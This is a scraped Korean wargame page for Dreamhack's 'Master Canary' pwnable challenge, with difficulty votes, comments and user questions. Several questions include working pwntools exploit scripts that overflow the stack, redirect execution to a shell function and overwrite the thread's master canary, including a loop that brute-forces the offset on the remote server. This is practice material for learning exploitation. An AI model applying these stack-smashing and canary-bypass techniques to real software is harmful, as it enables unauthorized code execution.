LEVEL 3

Master Canary

pwnable

1738

679

2022.02.04. 15:59:28

로그인 하고 문제 풀기

문제 정보
풀이 38
난이도 투표 105
질문 7
최근 풀이자 679
댓글 25

문제 설명

Description

Exploit Tech: Master Canary에서 실습하는 문제입니다.

Challenge Updates

2023.05.08: Dockerfile이 제공됩니다.
2023.05.26: Ubuntu 22.04 환경으로 업데이트하였습니다.

난이도 투표 105

전체 투표 로그

대표 업적 없음

LEVEL 1에 투표했습니다.

5일 전

대표 업적 없음

LEVEL 3에 투표했습니다.

7일 전

대표 업적 없음

LEVEL 4에 투표했습니다.

1개월 전

워게임: 20

LEVEL 3에 투표했습니다.

1개월 전

리버싱 졸업

LEVEL 3에 투표했습니다.

2개월 전

질문 5

문제 풀이에 어려움이 있으신가요?

커뮤니티에서 문제에 대한 질문하고 답변 얻기

Dockerfile로 구성한 환경에서는 되는데 서버에서는 안됩니다.

image.png 주어진 Dockerfile 빌드 (docker build -t m_t . ; docker run -d -it -p 7182:7182 --name mc_thread m_t) from pwn import * context.arch = 'amd64' context.log_level = 'debug' p = process('./mc_thread') p = remote("host3.dreamhack.games", 17841) p = remote('localhost', 7182) e = ELF('./mc_thread') def gdb_on(): gdb.attach(p) pause() gdb_on() code_section_addr = 0x404500-0x972 p.sendlineafter(b'Size: ', b'2352') payload = b'A'*0x110 # dummy payload += b'B'*0x8 # sfp payload += p64(e.symbols['giveshell']) # ret payload += b'C'*0x7f0 # dummy payload += p64(code_section_addr) # fs+0x10 payload += b'A'*0x18 # fs+0x28 p.sendafter(b'Data: ', payload) p.interactive() image.png p = remote('localhost', 7182)로 flag 출력 확인 image.png p = remote("host3.dreamhack.games", 17841) 실패 제공된 Dockerfile을 빌드해서 테스트 했을 때, flag 출력을 확인을 했기에 서버와 동일하다고 생각 돼 서버 주소로 바꾸니 되지 않습니다...Dockerfile과 서버 환경이 다른지, 아니면 제가 잘못 빌드한 것인지 궁금합니다.

send 여러 보내는 것과 한번 보내는 것의 차이가 궁금합니다.

아래처럼 p.send 호출할 때 하나의 payload 를 만들어서 호출하면 서버에 제출 시 쉘 획득이 되는데, from pwn import * d = 0x7f0 p = process("./mc_thread") p = remote("host3.dreamhack.games", 21778) p = remote("localhost", 7182) p_elf = ELF("./mc_thread") p.sendlineafter(b"Size: ", str( (0x110 + d + 0x28 + 8) // 8).encode()) p.recvuntil(b"Data: ") payload = b"A" * 0x110 payload += b"A" * 8 payload += p64(p_elf.symbols["giveshell"]) payload += b"A" * (d - 0x10) payload += b"A" * 0x10 payload += p64(0x404800 - 0x972) payload += b"A" * 0x18 p.send(payload) p.sendline(b"ls") recved = p.recv(100) info(f"received: {recved}") if b"smash" in recved: raise RuntimeError("Smash detected") success(f"0x{d:x}: Success") p.interactive() 제공된 소스코드에 read가 여러번 나눠서 받아 아래처럼 send를 똑같은 수만큼 나눠서 전송하면 p.recv(100) 에서 EOFError 가 나는데 이유가 무엇인지 궁금합니다. from pwn import * d = 0x7f0 p = process("./mc_thread") p = remote("host3.dreamhack.games", 21778) p = remote("localhost", 7182) p_elf = ELF("./mc_thread") p.sendlineafter(b"Size: ", str( (0x110 + d + 0x28 + 8) // 8).encode()) p.recvuntil(b"Data: ") for i in range(0x100 // 8): p.send(b"A" * 8) p.send(b"A" * 8) # rbp - 0x10 p.send(b"A" * 8) # rbp - 0x8(cnry) p.send(b"A" * 8) # rbp(sfp) p.send(p64(p_elf.symbols["giveshell"])) for i in range((d - 0x10) // 8): p.send(b"A"*8) p.send(b"A" * 8) p.send(b"A" * 8) p.send(p64(0x404800 - 0x972)) # pthread->self p.send(b"A" * 8) p.send(b"A" * 8) p.send(b"A" * 8) # master canary overwrite p.sendline(b"ls") recved = p.recv(100) info(f"received: {recved}") if b"smash" in recved: raise RuntimeError("Smash detected") success(f"0x{d:x}: Success") p.interactive() 근데 또 이상한건 서버에 제출하면 안되는데, 제공된 Dockerfile로 Docker 환경 구축해서 제출(p = remote("localhost", 7182)) 혹은 로컬 환경(p = process("./mc_thread"))에서 실행하면 정상적으로 동작합니다...

우분투 20.04, 18.04 로컬에서는 됐는데 서버에서는 왜 안 될까요...

우분투 20.04, 18.04 로컬에서는 됐는데 서버에서는 왜 안 될까요... 설마 16.04 일까요

로컬에서는 되는데 서버에서 안됩니다 ㅠ

로컬환경 ubuntu 22.04로 서버와 동일합니다. 혹시몰라 강의 예제코드 복붙해서 실행시켜봤는데도 (process() 만 remote() 로 변경해서요) 안됩니다... 이유가 있을까요?

Do I need to to fuzz?

The exploit (that dreamhack shows on exploit tech) works perfectly on local, but on remote it doesn't work... I try to bruteforce the distance between payload and master canary, Here is my script `from pwn import * context.log_level = 'debug' for i in range(400, 9000, 8): p = remote("host3.dreamhack.games", 17226) elf = ELF('./mc_thread') payload = b'A' * 264 payload += b'A' * 8 # canary payload += b'B' * 8 payload += p64(elf.symbols['giveshell']) payload += b'C' * (i - len(payload)) payload += p64(0x404800 - 0x972) payload += b'C' * (0x10) payload += p64(0x4141414141414141) inp_sz = len(payload) // 8 p.sendlineafter(b'Size: ', str(inp_sz).encode()) p.sendafter(b'Data: ', payload) p.sendline("cat flag") data = p.recvallS(timeout=3) if "DH{" in data: print(data) break` Is it like an overkill and I can understand the distance there is on remote? or I really need to do bruteforce? Thanks in advance

LEVEL 3

Master Canary

pwnable

1738

679

2022.02.04. 15:59:28

로그인 하고 문제 풀기

출제자 정보

대표 업적 없음

Dreamhack official account

First Blood!

대표 업적 없음

출제된 지 4시간 만에 풀이 완료!

대표 업적 없음

5일 전

대표 업적 없음

7일 전

기수단

14일 전

대표 업적 없음

15일 전

사이보그

1개월 전

대표 업적 없음

1개월 전

대표 업적 없음

1개월 전

워게임: 50

1개월 전

워게임: 20

1개월 전

대표 업적 없음

1개월 전

워게임: 20

1개월 전

???: 힙 익스 재밌어요! 힙 익스: ???

강의 수강: 1

6개월 전

MTU를 1000정도로 줄이면 풀립니다!

대표 업적 없음

6개월 전

너무 재밌긴한데 빡썌다

휴머노이드

10개월 전

MTU 줄이니까 되네요

대표 업적 없음

1년 전

이게 2단계?

소통요정

2년 전

좋은 연습문제입니다. 중간에 함정이 하나 있네요

공부벌레

2년 전

이게 도대체 어딜 봐서 Level. 2 짜리 문제인거죠?

대표 업적 없음

2년 전

몇 시간을 날린거야...

워게임: 1

2년 전

좀 이상한데..

워게임 고인물

2년 전

업데이트 이후 버전이랑 전 버전이랑 난이도 차이나는듯. 그리고 오프셋 주의!

Master Canary

문제 설명

Description

Challenge Updates

난이도 투표 105

질문 5

Master Canary

출제자 정보

First Blood!

최근 풀이자 679

댓글 25